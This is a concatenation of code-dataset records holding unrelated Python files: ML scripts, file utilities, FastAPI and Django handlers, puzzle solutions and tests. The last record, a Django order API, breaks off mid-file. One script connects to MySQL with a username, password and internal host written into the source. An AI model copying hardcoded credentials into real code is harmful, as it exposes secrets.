branch master\n urls=[\n \"https://github.com/bazelbuild/buildtools/archive/%s.zip\" %\n buildtools_version\n ],\n )\n","repo_name":"ostera/rules_reason","sub_path":"reason/repositories/bazel.bzl","file_name":"bazel.bzl","file_ext":"bzl","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"19804198602","text":"import os\r\nimport os.path\r\nimport shutil\r\nimport gui\r\nimport time\r\n\r\ns_path=gui.source\r\ndestination=gui.destination\r\nchoice=gui.choice\r\nfilelist=os.listdir(s_path)\r\nprint(\"_____________________________\\n\")\r\nprint(\"F I L E L I S T ::: \\n \")\r\nfor i in filelist:\r\n print(i)\r\nprint(\"_____________________________\\n\")\r\ns_path += '/'\r\ndestination += '/'\r\n\r\nif choice == 'extension wise':\r\n os.chdir(s_path)\r\n print(os.getcwd())\r\n exlist=[]\r\n\r\n for file in filelist:\r\n ex = file.split('.')[-1]\r\n exlist.append(ex)\r\n\r\n exlist=set(exlist)\r\n print(\"extension set of list : \",exlist)\r\n \r\n try:\r\n for ex in exlist:\r\n os.mkdir(destination + '/' + ex)\r\n for file in filelist:\r\n if ex == file.split('.')[-1]:\r\n if os.path.isfile(file):\r\n shutil.move(file , destination + '/' + ex)\r\n \r\n except FileExistsError:\r\n for ex in exlist:\r\n for file in filelist:\r\n if ex == file.split('.')[-1]:\r\n if os.path.isfile(file):\r\n shutil.move(file , destination + '/' + ex)\r\n \r\n \r\n \r\nelif choice == \"date & time wise\":\r\n s_path += '/'\r\n destination += '/'\r\n for file in filelist:\r\n t = os.path.getmtime(s_path + file)\r\n\r\n time1=time.ctime(t)\r\n\r\n year = time1[-4:]\r\n month = time1[4:7]\r\n date = time1[8:10]\r\n \r\n \r\n if not(os.path.isdir(destination + year)):\r\n path=os.path.join(destination, year)\r\n os.mkdir(path)\r\n if not(os.path.isdir(destination + year + '/' + month)):\r\n path1=os.path.join(destination + year , month)\r\n os.mkdir(path1)\r\n if not(os.path.isdir(destination + year + '/' + month + '/' + date)):\r\n path2=os.path.join(destination + year + '/' + month , date)\r\n os.mkdir(path2)\r\n\r\n s = s_path + file\r\n d = destination + year + '/' + month + '/' + date + '/' + file\r\n\r\n if os.path.exists(d):\r\n print(file,\" ------------->>> already exists\")\r\n continue\r\n\r\n shutil.move(s,d)","repo_name":"Jatin-nabhoya/Auto_File_Organization-Jatin_Nabhoya","sub_path":"auto_file_organization.py","file_name":"auto_file_organization.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20525261111","text":"\nimport numpy as np\nfrom read_file import read_file\nimport sys\nimport time\n\n# X is the data matrix (each row is a data point)\n# Y is desired output (1 or -1)\n\n\nclass myPegasos ():\n \"\"\" class myPegasos which implements SVM using \n Stochastic Gradient Descent implemneted with \n the Pegasos algorithm for training linear SVM.\n\n Attributes:\n lossf (list): store primal objective function value for each iteration\n w (numpy.array): trained weight\n y (numpy.array): class labels\n \"\"\"\n\n def __init__(self, X, y, _lambda, k):\n '''initialize classifer and train model\n\n Args:\n X(numpy.array): Data Matrix with mxn where m is the\n y (numpy.array): Target vector (1,-1)\n _lambda = regularization paramter\n k: training sample size for each iteration\n '''\n\n self.lossf = []\n self.w = self.optimize(X, y, _lambda, k)\n\n def optimize(self, X, y, _lambda, k):\n \"\"\"estimate the weight vector and intercept given X, y, _lambda, k\n Args:\n X (numpy.array): Data Matrix\n y (numpy.array): Response Vector\n Returns:\n numpy.array: trained weight vector w\n\n \"\"\"\n\n i_weight = np.zeros(X.shape[1])\n i_weight.fill(np.sqrt(1 / _lambda / X.shape[1]))\n rand_neg = np.random.randint(\n 0, high=X.shape[1], size=int(X.shape[1] / 2))\n i_weight[rand_neg] = -i_weight[rand_neg]\n\n w_current = i_weight\n\n ite = 0\n for t in range(1, 100 * X.shape[0]):\n ite = ite + 1\n if k != 1:\n X_t, y_t = self.selectk_data(X, y, k)\n\n else:\n ind = np.random.randint(0, high=X.shape[0], size=k)\n X_t, y_t = X[ind], y[ind]\n inds = np.dot(X_t, w_current) * y_t < 1\n\n X_sub = X_t[inds, :]\n y_sub = y_t[inds]\n\n const_t = 1.0 / _lambda / (t)\n weight = (1 - const_t * _lambda) * \\\n w_current + const_t / k * np.dot(y_sub, X_sub)\n mini = np.array([1, 1 / np.sqrt(_lambda) /\n np.sqrt(np.sum(weight**2))])\n\n w_new = np.amin(mini) * weight\n\n self.lossf.append(self.lossfxns(X, y, w_new, _lambda))\n\n if sum((w_new - w_current) ** 2) < 0.01:\n\n break\n else:\n w_current = w_new\n\n print(ite, ' iterations')\n return w_current\n\n def selectk_data(self, X, y, k):\n \"\"\"Select training set for each iteration\n\n Args:\n X (numpy.array): Data Matrix\n y (numpy.array): Response Vector\n k (int): training sample size for each iteration\n\n Returns:\n (numpy.array, numpy.array): (X_k, y_k)\n \"\"\"\n percent = k / 2000.0\n X_1 = X[y == 1]\n X_2 = X[y == -1]\n y_1 = y[y == 1]\n y_2 = y[y == -1]\n\n inds1 = np.random.randint(\n 0, high=X_1.shape[0], size=round(percent * X_1.shape[0]))\n inds2 = np.random.randint(\n 0, high=X_2.shape[0], size=round(percent * X_2.shape[0]))\n\n X_k = np.concatenate((X_1[inds1, :], X_2[inds2, :]))\n y_k = np.concatenate((y_1[inds1], y_2[inds2]))\n return X_k, y_k\n\n def predict(self, X, y):\n \"\"\"Predict the class label for each observation in\n the data X and calculate error based on response vector y\n\n Args:\n predicted(numpy.array, numpy.array):\n Returns:\n float: error based on predicted class vs response vector\n \"\"\"\n prediction = np.dot(self.w[:, np.newaxis].T, X.T)\n prediction = np.squeeze(prediction)\n\n predict = np.zeros_like(y)\n for i in range(prediction.shape[0]):\n if prediction[i] > 0:\n predict[i] = 1\n else:\n predict[i] = -1\n\n errors = np.array([predict[i] != y[i] for i in range(0, y.shape[0])])\n totalerror = np.sum(errors) / y.shape[0]\n return totalerror\n\n def lossfxns(self, X, y, w, _lambda):\n \"\"\"Calcualte the loss function for the SVM problem\n\n Args:\n X (numpy.array): Design Matrix (m x n)\n y (numpy.array): Response Vector (1 x m)\n weight (numpy.array): weight parameter (1 x n)\n _lambda (float): regularization parameter\n Returns:\n float: current value of the primal objective function\n \"\"\"\n tmp = 1 - y * np.dot(X, w)\n lossf = sum(tmp[(1 - y * np.dot(X, w)) > 0]) / X.shape[0] + \\\n _lambda / 2 * np.dot(w, w)\n return lossf\n\n\ndef featureNormalize(X):\n \"\"\"Preprocesses the data by subtracing the mean and dividing over std.axis\n Also adds intercept into feature\n\n Args:\n X (numpy.array): Data Matrix (m x n)\n\n Returns:\n numpy.array: Processed Data Matrix\n \"\"\"\n stds = X.std(axis=0)\n newX = np.delete(X, np.where(stds == 0), 1)\n\n stds = newX.std(axis=0)\n means = newX.mean(axis=0)\n newX = (newX - means) / stds\n\n return np.concatenate((np.ones((newX.shape[0], 1)), newX), axis=1)\n\n\nif __name__ == \"__main__\":\n X, y = read_file(sys.argv[1])\n X = featureNormalize(X)\n\n times = []\n numruns = int(sys.argv[3])\n k = int(sys.argv[2])\n\n for i in range(numruns):\n print(\"Training model \", i + 1, ' out of ',\n numruns, \"...\")\n\n begin = time.time()\n mP = myPegasos(X, y, 1e-4, k)\n\n end = time.time()\n times.append(end - begin)\n\n print('Runtime: ', round(end - begin, 3), ' seconds')\n\n print(\"\\n\")\n # Print combined error rates for each train set\n # percent averaged by the number of folds that ran\n print(\"------FINAL RESULT -------\")\n print('Average runtime w/ minibatch size of ', k,\n ':\\t', round(np.mean(times), 3), \" sec.\")\n\n print('STD runtime w/ minibatch size of ', k,\n ':\\t', round(np.std(times), 3), \" sec.\")\n","repo_name":"DanielYWu/svm-scratch","sub_path":"myPegasos.py","file_name":"myPegasos.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2920176887","text":"#read data\r\nimport numpy as np\r\nimport pandas as pd\r\ndata = pd.read_csv(\"C:\\\\xampp\\\\htdocs\\\\HOUSE_PRICE_PREDICTION\\\\data.csv\")\r\n\r\nx = data.drop(labels = [\"price\"],axis=1).copy()\r\ny = ((data[\"price\"])/1000000).copy()\r\n\r\n#preprocssing using minmaxscaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nalgo = MinMaxScaler()\r\nalgo.fit(x)\r\ndata1 = pd.DataFrame(data = algo.fit_transform(x),columns=x.columns,index = x.index)\r\n\r\n#split data\r\nfrom sklearn import model_selection\r\nxtrain,xtest,ytrain,ytest=model_selection.train_test_split(x,y,test_size =0.2)\r\n\r\n#train model -- XGBClassifier from xgboost\r\nfrom xgboost import XGBRegressor\r\nmodel = XGBRegressor()\r\nmodel.fit(xtrain,ytrain)\r\n\r\n#checking error for training data\r\nfrom sklearn import metrics\r\npred = model.predict(xtrain)\r\nscore1 = metrics.r2_score(ytrain,pred)\r\nscore2 = metrics.mean_absolute_error(ytrain,pred)\r\n\r\n#checking error for testing data\r\ntest_pred = model.predict(xtest)\r\nscore3 = metrics.r2_score(ytest,test_pred)\r\nscore4 = metrics.mean_squared_error(ytest,test_pred)\r\n\r\n\r\n# load and dump the model using pickle\r\nimport pickle\r\npickle.dump(model,open('python/models/model.pkl','wb'))\r\n\r\nmodels = pickle.load(open('python/models/model.pkl','rb'))\r\nd = pd.DataFrame([[3,2.5,1460,7573,2,0,0,3,1460,0,1983,2009]],columns=x.columns)\r\n\r\nprint(model.predict(d)*1000000)\r\nprint(score3,score4)","repo_name":"rachit-singhal12/house-price-prediction","sub_path":"python/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33543935754","text":"import numpy as np\nimport pymysql\nfrom DBUtils.PooledDB import PooledDB\nimport time\nimport traj_dist.distance as tdist\nimport math\n\nstart = time.clock()\n\ndef conndbWithPool():\n\n pool = PooledDB(pymysql, 5, host=\"10.103.31.129\", user=\"nmy\", passwd=\"819819\", db=\"wifi_union\", port=3306) # 5为连接池里的最少连接数\n conn = pool.connection()\n cur = conn.cursor()\n SQL = \"SELECT usermac,latitude,longitude FROM wifi_union.appunion_log_detailed_concise where latitude<>0 group by time order by usermac;\"\n r = cur.execute(SQL)\n r = cur.fetchall()\n cur.close()\n conn.close()\n\n return r\n\ndef store_to_dirct(rs):\n user = {}\n new_list = []\n for n in rs:\n if n[0] not in user:\n new_list=[]\n new_list.append(list(map(float, [n[1],n[2]])))\n user[n[0]]=new_list\n return user\n\n\ndef computeNearestNeighbor(user,username):\n distances = []\n for instance in user:\n if instance != username:\n distance = tdist.edr(np.array(user[username]), np.array(user[instance]))\n #对豪斯多夫距离取对数加1的倒数\n # distance=1/(math.log10(distance)+1)\n distances.append((instance, distance))\n distances.sort(key=lambda artistTuple: artistTuple[1], reverse=False)\n return distances\n\nrs=conndbWithPool()\n\nuser=store_to_dirct(rs)\n\n\n# print(user)\n# traj_A=np.array(user['28faa04f853a'])\n# traj_B=np.array(user['C4500620C219'])\n#\n# dist = tdist.hausdorff(traj_A,traj_B)\n# print(dist,math.log10(dist))\n#\ndistances=computeNearestNeighbor(user,'C4500620C219')\nprint(distances)\n\nend=time.clock()\nprint (\"read: %f s\" % (end - start))\n\n\n","repo_name":"niumingyoi123/WiFi_UNION","sub_path":"traj_dist/location_db.py","file_name":"location_db.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3683770984","text":"# options.py\n\nfrom modules.db.mongodb import get_db_mumshoppe\nfrom pymongo import ReturnDocument\nfrom bson import json_util\nimport json\nimport uuid\n\nfrom typing import Optional\n\nfrom fastapi import APIRouter, Response, status\nfrom pydantic import BaseModel\n\n\nclass Option(BaseModel):\n optionguid: Optional[str] = None\n name: str\n subsection: Optional[str] = ''\n price: float\n position: Optional[int] = 0\n\n\nclass Section(BaseModel):\n guid: Optional[str] = None\n shoppe_guid: str\n title: str\n notes: Optional[str]\n options: list[Option]\n position: Optional[int] = 0\n\n\nrouter = APIRouter(\n prefix=\"/options\",\n tags=[\"mumshoppe_options\"],\n responses={\n 404: {\"description\": \"Not found\"},\n 400: {\"description\": \"Invalid request\"}\n }\n)\n\n# TODO: CRUD for option items\n\n\n@router.get(\"/list/{shoppe_id}\", status_code=status.HTTP_200_OK)\nasync def get_section(shoppe_id: str, response: Response):\n try:\n section_collection = get_db_mumshoppe().sections.find({\n \"shoppe_guid\": shoppe_id\n })\n return json.loads(json_util.dumps(section_collection))\n except Exception as e:\n response.status_code = status.HTTP_400_BAD_REQUEST\n print('Failed to list options', e)\n return None\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add_section(section: Section, response: Response):\n try:\n section_collection = get_db_mumshoppe().sections\n if not section.guid:\n section.guid = str(uuid.uuid4())\n\n for detail in section:\n if len(detail.guid) == 0 or not detail.guid:\n detail.guid = str(uuid.uuid4())\n\n record = section_collection.find_one_and_update(\n {\"guid\": section.guid},\n {\"$set\": section.dict()},\n upsert=True,\n return_document=ReturnDocument.AFTER)\n # Remove object id - we're not using that as an index and it breaks Pydantic\n del record[\"_id\"]\n return record\n except Exception as e:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\"Error\": e}\n\n\n@router.patch(\"/{section_id}\", status_code=status.HTTP_202_ACCEPTED)\nasync def update_section(section_id: str, section: Section, response: Response):\n try:\n for detail in section.options:\n if detail.optionguid == None or detail.optionguid == '':\n detail.optionguid = str(uuid.uuid4())\n \n section_collection = get_db_mumshoppe().sections\n record = section_collection.find_one_and_update(\n {\"guid\": section_id},\n {\"$set\": section.dict()},\n upsert=True,\n return_document=ReturnDocument.AFTER)\n del record[\"_id\"]\n return record\n except Exception as e:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\"Unable to update options\": e}\n\n# TODO: For each option in a section, if there is no GUID, need to add one before insert / update on that record\n\n\n@router.delete('/{section_id}', status_code=status.HTTP_202_ACCEPTED)\nasync def delete_section(section_id: str, response: Response):\n try:\n section_collection = get_db_mumshoppe().sections\n record = section_collection.find_one_and_delete(\n {\"guid\": section_id},\n )\n return True\n except Exception as e:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\"Unable to delete section\": e}\n","repo_name":"bulldoguk/myhmbiz-api","sub_path":"routers/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8735074504","text":"from collections import defaultdict\nfrom typing import Counter\n\n\nwith open(\"day_14/input.txt\") as file:\n START_MOLECULE = file.readline().strip()\n file.readline() # Blank line\n RULES = dict(line.strip().split(\" -> \") for line in file.readlines())\n\nSTEPS = 40\n\ntotal_elements = defaultdict(lambda: 0)\nfor element in START_MOLECULE:\n total_elements[element] += 1\n\npatterns = defaultdict(lambda: 0)\n\nfor i in range(len(START_MOLECULE) - 1):\n key = START_MOLECULE[i] + START_MOLECULE[i + 1]\n patterns[key] += 1\n\nfor _ in range(STEPS):\n new_patterns = defaultdict(lambda: 0)\n\n for pattern, extra in RULES.items():\n count = patterns[pattern]\n\n total_elements[extra] += count\n new_patterns[pattern[0] + extra] += count\n new_patterns[extra + pattern[1]] += count\n\n patterns = new_patterns\n\ncounter = Counter(total_elements).most_common()\nprint(counter[0][1] - counter[-1][1])\n","repo_name":"Akarys42/aoc-2021","sub_path":"day_14/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2600941010","text":"TextFile = open(\"qb.txt\", \"r\")\r\nTextList = TextFile.readlines()\r\nTextFile.close()\r\n\r\nCharacter = input(\"enter a character: \")\r\n\r\nOutFile = open(\"OutFile.txt\", \"w\")\r\n\r\nfor line in TextList:\r\n PositionCounter = 0\r\n while PositionCounter != len(line):\r\n if line[PositionCounter] == ' ':\r\n line = line[:PositionCounter] + Character + line[PositionCounter + 1:]\r\n PositionCounter = PositionCounter + 1\r\n OutFile.write(line + '\\n')\r\n \r\n\r\nOutFile.close()\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"Yuudachi530/assignment-19.9.19","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9224337144","text":"__author__ = \"EUROCONTROL (SWIM)\"\n\nfrom unittest import mock\n\nimport pytest\nfrom requests import Session, HTTPError, Response\n\nfrom met_update.adapters import avwx\nfrom met_update import config\n\n\ndef test_get_session__avwx_token_not_set__raises_error(monkeypatch):\n monkeypatch.setattr(config, 'AVWX_TOKEN', None)\n\n with pytest.raises(ValueError) as e:\n avwx.get_session()\n\n assert str(e.value) == 'AVWX_TOKEN not set'\n\n\ndef test_get_session__no_errors__returns_session_object(monkeypatch):\n monkeypatch.setattr(config, 'AVWX_TOKEN', 'some_token')\n\n result = avwx.get_session()\n\n assert isinstance(result, Session)\n assert result.headers == {'Authorization': f'BEARER some_token'}\n\n\n@mock.patch('met_update.adapters.avwx.get_session')\ndef test_call_api__response_with_error__raises(mock_get_session):\n mock_response = Response()\n mock_response.status_code = 400\n\n mock_session = mock.Mock()\n mock_session.get = mock.Mock(return_value=mock_response)\n\n mock_get_session.return_value = mock_session\n\n with pytest.raises(HTTPError):\n avwx._call_api('')\n\n\n@mock.patch('met_update.adapters.avwx.get_session')\ndef test_call_api__no_errors__returns_response_data(mock_get_session):\n mock_response = Response()\n mock_response.status_code = 200\n mock_response._content = b'{\"data\": {}}'\n\n mock_session = mock.Mock()\n mock_session.get = mock.Mock(return_value=mock_response)\n\n mock_get_session.return_value = mock_session\n\n result = avwx._call_api('')\n\n assert result == {'data': {}}\n\n\n@mock.patch('met_update.adapters.avwx._call_api')\ndef test_get_taf(mock_call_api):\n airport_icao = 'EHAM'\n avwx.get_taf(airport_icao)\n\n expected_called_url = f'https://avwx.rest/api/taf/EHAM'\n\n mock_call_api.assert_called_once_with(url=expected_called_url)\n\n\n@mock.patch('met_update.adapters.avwx._call_api')\ndef test_get_metar(mock_call_api):\n airport_icao = 'EHAM'\n avwx.get_metar(airport_icao)\n\n expected_called_url = f'https://avwx.rest/api/metar/EHAM'\n\n mock_call_api.assert_called_once_with(url=expected_called_url)\n","repo_name":"eurocontrol-swim/predicted-runway-met-update","sub_path":"tests/adapters/test_avwx.py","file_name":"test_avwx.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6958730246","text":"from fastapi import FastAPI\nfrom fastapi.responses import RedirectResponse\nfrom prisma import Prisma\nfrom prisma.models import Post, User\nfrom faker import Faker\n\n\ndb = Prisma()\napp = FastAPI()\nfake = Faker()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await db.connect()\n\n if not await db.user.find_first():\n for i in range(1, 5):\n await db.user.create(\n {\n \"id\": i,\n \"name\": fake.name(),\n \"email\": fake.email(),\n \"posts\": {\n \"create\": [\n {\n \"title\": f\"Post {j}\",\n \"content\": fake.paragraph(nb_sentences=5),\n \"published\": True,\n }\n for j in range(1, 5)\n ]\n },\n }\n )\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await db.disconnect()\n\n\n@app.get(\"/\")\ndef home():\n return RedirectResponse(url=\"/docs\")\n\n\n@app.get(\"/posts\", response_model=list[Post])\nasync def get_posts():\n return await db.post.find_many(include={\"author\": True})\n\n\n@app.get(\"/users\", response_model=list[User])\nasync def get_users():\n return await db.user.find_many(include={\"posts\": True})\n\n\n@app.delete(\"/all\")\nasync def delete_all():\n deleted_posts = await db.post.delete_many()\n deleted_users = await db.user.delete_many()\n\n return {\"Deleted posts\": deleted_posts, \"Deleted users\": deleted_users}\n","repo_name":"AndreasPB/prisma-ssot","sub_path":"py/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28005180019","text":"import mmint_utils\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncnn_res_fn = \"out/results/cnn_res.pkl.gzip\"\nkp_res_fn = \"out/results/kp_res.pkl.gzip\"\nkp_interp_res_fn = \"out/results/kp_int_res.pkl.gzip\"\n\ncnn_res = mmint_utils.load_gzip_pickle(cnn_res_fn)\nkp_res = mmint_utils.load_gzip_pickle(kp_res_fn)\nkp_interp_res = mmint_utils.load_gzip_pickle(kp_interp_res_fn)\n\nz_angles = np.arange(0.0, np.pi / 2.0, (np.pi / 2.0) / 200)\ncnn_iou = cnn_res['iou']\nkp_iou = kp_res['iou']\nkp_interp_iou = kp_interp_res['iou']\n\nplt.plot(z_angles, cnn_iou, label='CNN-Net')\nplt.plot(z_angles, kp_iou, label='KP-Net')\nplt.plot(z_angles, kp_interp_iou, label='KP-Net (Interp.)')\nplt.xlabel(\"Angle\")\nplt.ylabel(\"IoU\")\nplt.legend()\nplt.xlim(0.0, np.pi/2.0)\nplt.ylim(0.0, 1.0)\n\nplt.show()\n","repo_name":"mvandermerwe/object_keypoints","sub_path":"scripts/plotting/plot_interpolation_results.py","file_name":"plot_interpolation_results.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23643310111","text":"input = open(\"C-large.in\",\"r\")\r\noutput = open(\"C-large.out\",\"w\")\r\ntest_cases = int(input.readline())\r\nfor test in range(test_cases):\r\n\tA,B = input.readline().split(\" \")\r\n\tcount = 0\r\n\ts = set()\r\n\t#print \"test\",test\r\n\tn = int(A)\r\n\tb = int(B)\r\n\twhile n < b+1:\r\n\t\tN = str(n)\r\n\t\tfor i in range(len(N)-1):\r\n\t\t\tx = N[i+1:] + N[0:i+1]\r\n\t\t\tif int(A) <= n < int(x) <= int(B):\r\n\t\t\t\ts.add((n,x))\r\n\t\tn += 1\r\n\toutput.write(\"Case #%i: %i\\n\"%(test+1,len(s)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1363.py","file_name":"1363.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16072982868","text":"#!/usr/bin/env python3\n\nimport re\n\n\"\"\"\n\nhttps://www.hackerrank.com/challenges/ip-address-validation/problem\n\n\nDetermine whether input is IPv4, IPv6, or Neither\n\nIPv4 was the first publicly used Internet Protocol which used 4 byte addresses\nwhich permitted for 232 addresses. The typical format of an IPv4 address is\nA.B.C.D where A, B, C and D are Integers lying between\n0 and 255 (both inclusive).\n\nIPv6, with 128 bits was developed to permit the expansion of the address space.\nTo quote from the linked article: The 128 bits of an IPv6 address are\nrepresented in 8 groups of 16 bits each. Each group is written as\n4 hexadecimal digits and the groups are separated by colons (:).\n\nThe address 2001:0db8:0000:0000:0000:ff00:0042:8329 is an\nexample of this representation.\n\nConsecutive sections of zeros will be left as they are.\nAn IPv6 value such as \"...:0:...\" or \"...:5:...\" is address-wise identical\nto \"...:0000:...\" or \"...:0005:....\". Leading zeros may be omitted in\nwriting the address.\n\nSample input:\n3\nThis line has junk text.\n121.18.19.20\n2001:0db8:0000:0000:0000:ff00:0042:8329\n\nSample output:\nNeither\nIPv4\nIPv6\n\n\"\"\"\n\n\ndef classify_ip(ip):\n # This is a proper regex to grep IPv4 Address\n # ^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])$\n ipv4_patt = re.compile(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$')\n ipv4 = ipv4_patt.match(ip)\n\n ipv6_patt = re.compile(r'^([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$')\n ipv6 = ipv6_patt.match(ip)\n\n if ipv4:\n temp = ipv4.group().split(\".\")\n for item in temp:\n x = int(item)\n if x > 255:\n return \"Neither\"\n\n return \"IPv4\"\n\n elif ipv6:\n return \"IPv6\"\n\n else:\n return \"Neither\"\n\n\nif __name__ == \"__main__\":\n\n input_count = int(input())\n\n out = []\n\n for i in range(input_count):\n ip = input()\n out.append(classify_ip(ip))\n\n for i in out:\n print(i)\n","repo_name":"asinggih/coding-challenges","sub_path":"ip_classifier.py","file_name":"ip_classifier.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11303241779","text":"from rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .serializer import OrderSerializer, Order_detailSerializer\nfrom main.serializer import HobbySerializer\nfrom user.serializer import SubSerializer, Sub_pdSerializer\nfrom .models import Order, Order_detail, Hobby\nfrom user.models import Subscription, Sub_pd\nfrom rest_framework.exceptions import APIException, AuthenticationFailed\nfrom rest_framework.authentication import get_authorization_header\nfrom user.authentication import create_access_token, create_refresh_token, decode_access_token, decode_refresh_token, access_token_exp\nfrom rest_framework.pagination import PageNumberPagination\nfrom django.db.models import Count\n# Create your views here.\n\nclass OrderAPIView(APIView):\n def get(self, request):\n # 해당 유저 토큰으로 주문정보 필터링 & json직렬화\n order_condition = request.GET.get('type', None)\n\n auth = get_authorization_header(request).split()\n if auth and len(auth) == 2:\n token = auth[1].decode('utf-8')\n id = decode_access_token(token)\n order_obj = Order.objects.filter(o_user=id)\n serializer = OrderSerializer(order_obj, many=True, context={\"request\": request})\n order_data = []\n # 반복할 숫자 선언(num) & 직렬화된 데이터에서 주문id 추출 --> 해당 주문 id의 주문 디테일 id 필터링 & json직렬화 \n if order_condition == 'item':\n \n for order in serializer.data:\n order_pd = Order_detail.objects.filter(od_id=order['id'])\n detail_serializer = Order_detailSerializer(order_pd, many=True, context={\"request\": request})\n detail_serializer = detail_serializer.data\n \n detail_order_data = []\n order_data_obj = {\n \"o_id\" : order['id'],\n \"o_add\" : order['o_add'],\n \"o_num\" : order['o_num'],\n \"o_name\" : order['o_name'],\n \"o_pay\" : order['o_pay'],\n \"o_total_price\" : order['o_total_price'],\n \"o_create\" : order['o_create'],\n \"o_items\" : detail_order_data\n }\n # 반복할 숫자 선언(dict_od_id_num) & 주문 디테일에서 주문한 상품정보 id추출 --> 해당 상품정보 id의 상품 필터링 & json직렬화\n \n for order_pd in detail_serializer:\n \n order_hobby = Hobby.objects.filter(pd_id=order_pd['od_pd'])\n hobby_serializer = HobbySerializer(order_hobby, many=True, context={\"request\": request})\n hobby_serializer = hobby_serializer.data[0]\n\n \n detail_order_data_obj= {\n \"p_id\" : order_pd[\"od_pd\"],\n \"p_quantity\" : order_pd['od_quantity'],\n \"p_total_price\" : order_pd['od_price'],\n \"p_title\" : hobby_serializer['pd_title'],\n \"p_description\" : hobby_serializer['pd_descrition'],\n \"p_info\" : hobby_serializer['pd_info'],\n \"p_price\" : hobby_serializer['pd_price'],\n \"p_sell\" : hobby_serializer['pd_sell'],\n \"p_create\" : hobby_serializer['pd_create'],\n \"p_image\" : hobby_serializer['images']\n }\n\n detail_order_data.append(detail_order_data_obj)\n if len(detail_serializer) != 0:\n order_data.append(order_data_obj)\n \n \n elif order_condition == 'sub':\n \n for order in serializer.data:\n \n order_pd = Subscription.objects.filter(order_id=order['id'])\n sub_serializer = SubSerializer(order_pd, many=True, context={\"request\": request})\n \n if len(sub_serializer.data) == 0:\n continue\n sub_serializer = sub_serializer.data[0]\n \n subpd = Sub_pd.objects.filter(id=sub_serializer['subpd_id'])\n subpd_serializer = Sub_pdSerializer(subpd, many=True, context={\"request\": request})\n subpd_serializer = subpd_serializer.data[0]\n \n sub_order_data = []\n order_data_obj = {\n \"o_id\" : order['id'],\n \"o_add\" : order['o_add'],\n \"o_num\" : order['o_num'],\n \"o_name\" : order['o_name'],\n \"o_pay\" : order['o_pay'],\n \"o_total_price\" : order['o_total_price'],\n \"o_create\" : order['o_create'],\n \"o_items\" : sub_order_data\n }\n detail_order_data_obj = {\n \"sub_id\" : sub_serializer['id'],\n \"s_id\" : subpd_serializer['id'],\n \"s_title\" : subpd_serializer['title'],\n \"s_body\" : subpd_serializer['body'],\n \"s_price\" : subpd_serializer['price'],\n \"s_sub_image\" : subpd_serializer['sub_image'],\n \"s_create\" : sub_serializer['create_time'],\n \"s_delete\" : sub_serializer['delete_time']\n }\n sub_order_data.append(detail_order_data_obj)\n order_data.append(order_data_obj)\n \n return Response({\n \"order\" : order_data,\n }, status=status.HTTP_200_OK)\n\n else:\n return Response({'message' : \"no auth token, order_condition: \" + order_condition})\n\n def post(self, request):\n paginator = PageNumberPagination()\n order_condition = request.GET.get('type', None)\n\n auth = get_authorization_header(request).split()\n if auth and len(auth) == 2:\n token = auth[1].decode('utf-8')\n id = decode_access_token(token)\n \n order_data = {\n \"o_user\": id, \n \"o_add\": request.data[\"address\"], \n \"o_num\": request.data[\"number\"], \n \"o_name\": request.data[\"name\"], \n \"o_pay\": request.data[\"payment\"], \n \"o_total_price\": request.data[\"totalPrice\"],\n }\n serializer = OrderSerializer(data=order_data)\n if serializer.is_valid():\n current_order = serializer.save()\n\n current_order_id = current_order.id\n \n if order_condition == 'item': #상품 주문시 order post\n\n for item in request.data[\"items\"]:\n od_detail_data = {\n \"od_id\": current_order_id,\n \"od_pd\": 